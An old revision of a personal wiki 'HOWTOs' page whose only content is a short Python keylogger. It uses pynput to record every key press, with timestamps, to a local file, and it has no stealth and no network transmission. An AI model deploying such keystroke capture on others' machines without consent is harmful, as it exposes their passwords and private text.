howtos

This is an old revision of the document!


HOWTOs

Instructions for performing tasks that I do often enough to need to know but infrequently enough to never remember the details.

from pynput.keyboard import Key, Listener
import logging

logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s")

def on_press(key):
    logging.info(str(key))
    
with Listener(on_press=on_press) as listener:
    listener.join()

  • howtos.1670269243.txt.gz
  • Last modified: 2022-12-05 19:40
  • by asdf